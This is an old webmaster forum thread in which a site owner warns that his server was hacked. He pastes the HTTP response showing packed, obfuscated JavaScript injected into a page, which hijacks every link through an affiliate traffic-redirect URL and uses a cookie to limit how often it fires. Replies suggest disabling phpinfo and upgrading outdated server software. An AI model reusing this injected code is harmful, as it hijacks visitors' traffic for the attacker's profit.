Hacking server and redirecting

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • blablabla
    Confirmed User
    • Feb 2005
    • 210

    #1

    Hacking server and redirecting

    Be aware! I got my server hacked for redirecting reasons.

    For those that think their traffic looks strange check your phpinfo.php file:

    GET /phpinfo.php HTTP/1.0
    Host: XXX
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows XP; DigExt)
    Accept-Language: en-us
    Referer: http://google.com/
    Accept-Encoding: gzip, deflate

    HTTP/1.1 200 OK
    Date: Wed, 24 May 2006 09:31:12 GMT
    Server: Apache/1.3.33 (Unix) PHP/4.3.10
    Vary: Referer
    X-Powered-By: PHP/4.3.10
    Expires: Tue, 01 Jan 1990 00:00:00 GMT
    Last-Modified: Wed, 24 May 2006 09:31:12 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
    Connection: close
    Content-Type: text/html

    eval(function(p,a,c,k,e,d){e=function(c){return(c< a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toStr ing(36))};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('2.A(\'<w v="e()">\');h e(){5 s="r://p-k.o/n.m?l=x&u=";9(2.7.8("f=1")hahahaha-1&&2.7.8("q")hahahaha-1&&2.7.8("y")hahahaha-1&&2.G.8("H")hahahaha-1){j(5 i=0;i<2.3.a;++i){9(2.3[i].4)2.3[i].4=s+2.3[i].4}5 g=d c();5 6=d c();6.E(g.C()+B);2.7="f=1; 6="+6.z();h b(){j(5 i=0;i<2.3.a;++i){9(2.3[i].4)2.3[i].4=2.3[i].4.F(s.a)}}t(b,D)}}',44,44,'||document|links|href| var|expires|cookie|indexOf|if|length|normal|Date|n ew|remake|zq|today|function||for|router|affid|php| traff|com|gall|adm|http||setTimeout||onclick|body| frog33|login|toGMTString|write|86400000|getTime|30 0|setTime|substring|referrer|admin'.split('|')))
  • fris
    Too lazy to set a custom title
    • Aug 2002
    • 55679

    #2
    thats why you disable the phpinfo file
    Since 1999: 69 Adult Industry awards for Best Hosting Company and professional excellence.

    Comment

    • PussyTeenies
      Confirmed User
      • Feb 2005
      • 6496

      #3
      does EVRYBODY have a phpinfo.php file??
      Need adult hosting?

      Contact us!
      WARM Hosting

      Need an IT solution? or someone to check your site and security? Nossie - IT Professional

      Comment

      • PussyTeenies
        Confirmed User
        • Feb 2005
        • 6496

        #4
        just use this in httpd.conf , htaccess or php.ini
        disable_functions = phpinfo
        Need adult hosting?

        Contact us!
        WARM Hosting

        Need an IT solution? or someone to check your site and security? Nossie - IT Professional

        Comment

        • Screaming
          I can change this!!!!!
          • Feb 2004
          • 18972

          #5
          damn that sucks ass..

          Comment

          • redfrog
            Registered User
            • Aug 2004
            • 78

            #6
            this code above , where do u see the redirecting code? and plz explain how to check the php info file

            thnaks
            http://www.jigglymelons.com | http://www.jigglymelons.com/mgp

            Comment

            • directfiesta
              Too lazy to set a custom title
              • Oct 2002
              • 30135

              #7
              Clients mostly want the phpinfo file.

              It gives a lot of info ( if not all ) on the server... But that same info is available to the hackers ...

              This article explains a bit, but it is in french ( coding isn't ).
              I know that Asspimple is stoopid ... As he says, it is a FACT !

              But I can't figure out how he can breathe or type , at the same time ....

              Comment

              • blablabla
                Confirmed User
                • Feb 2005
                • 210

                #8
                Can anybody suggest to me how is the best and most efficient way to get this hacking dude and his site down with the neck? To send a complaint to his host??

                Comment

                • blablabla
                  Confirmed User
                  • Feb 2005
                  • 210

                  #9
                  bump it up

                  Comment

                  • flashbang
                    Confirmed User
                    • May 2006
                    • 767

                    #10
                    Server: Apache/1.3.33 (Unix) PHP/4.3.10

                    That would probably explain why you got hacked
                    You need to hire someone to update your servers if you are not going to



                    Your TGP traffic belongs to you again
                    |
                    X Rated Words & Hard Links

                    Comment

                    • blablabla
                      Confirmed User
                      • Feb 2005
                      • 210

                      #11
                      Originally posted by flashbang
                      Server: Apache/1.3.33 (Unix) PHP/4.3.10

                      That would probably explain why you got hacked
                      You need to hire someone to update your servers if you are not going to
                      Thanks for that info man...

                      Comment

                      • flashbang
                        Confirmed User
                        • May 2006
                        • 767

                        #12
                        I know a guy who can do that for you in like 20 minutes, post your info if you want him to contact you



                        Your TGP traffic belongs to you again
                        |
                        X Rated Words & Hard Links

                        Comment

                        Working...